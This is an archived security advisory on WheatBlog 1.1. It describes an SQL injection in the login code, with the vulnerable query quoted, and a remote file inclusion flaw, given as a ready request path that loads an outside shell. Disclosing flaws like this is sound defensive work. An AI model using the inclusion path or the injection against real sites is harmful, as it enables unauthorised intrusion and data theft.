TUCoPS :: Web :: Blogs :: tb11483.htm

WheatBlog 1.1 RFI/SQL Injection
WheatBlog 1.1 RFI/SQL Injection
WheatBlog 1.1 RFI/SQL Injection



Found by E.Minaev (underwater@itdefence.ru) 
ITDefence.ru 

1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off).

------------------------------------------
"$sql = "select * from $tblUsers where login = '$login'";
if ( $login	 != $row['login'] )	$valid_user = 0;
		if ( $password  != $row['password'] ) $valid_user = 0;"
------------------------------------------

2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?
 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH